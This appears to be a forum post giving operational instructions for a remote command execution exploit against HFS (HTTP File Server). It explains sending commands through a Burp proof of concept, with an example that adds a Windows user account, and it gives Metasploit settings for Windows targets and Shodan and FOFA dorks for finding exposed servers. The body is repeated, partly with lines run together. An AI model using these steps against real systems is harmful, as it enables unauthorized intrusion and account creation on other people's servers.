● PoC for Burp:
as you can see above the command that will be sent remotely is "ipconfig /all".
Please keep in mind that if your command has spaces, you should add a plus in between
(for example: net+user+(your_username)+(your_password)+/add)
● The PoC is even able to return the results back after sending the request in Burp, just scroll down a little (refer to Figure_1.JPG)
● If you are lazy to use the Burp PoC then you can use the new metasploit module (haven't tried)
Link: https://github.com/rapid7/metasploit-framework/pull/19240/files
(scroll down till you see the ruby file)
● If you are going to target windows systems with this exploit then here is the necessary config for the msf:
set payload cmd/windows/generic (for executing a cmd command)
set RHOSTS (your_remote_target)
check (optional)
run
● Dorks:
Shodan: title:"HFS /" port:80
FOFA: app="HFS"
as you can see above the command that will be sent remotely is "ipconfig /all".
Please keep in mind that if your command has spaces, you should add a plus in between
(for example: net+user+(your_username)+(your_password)+/add)
● The PoC is even able to return the results back after sending the request in Burp, just scroll down a little (refer to Figure_1.JPG)
● If you are lazy to use the Burp PoC then you can use the new metasploit module (haven't tried)
Link: https://github.com/rapid7/metasploit-framework/pull/19240/files
(scroll down till you see the ruby file)
● If you are going to target windows systems with this exploit then here is the necessary config for the msf:
set payload cmd/windows/generic (for executing a cmd command) set RHOSTS (your_remote_target) check (optional) run● Dorks:
Shodan: title:"HFS /" port:80FOFA: app="HFS"Вложения
Последнее редактирование: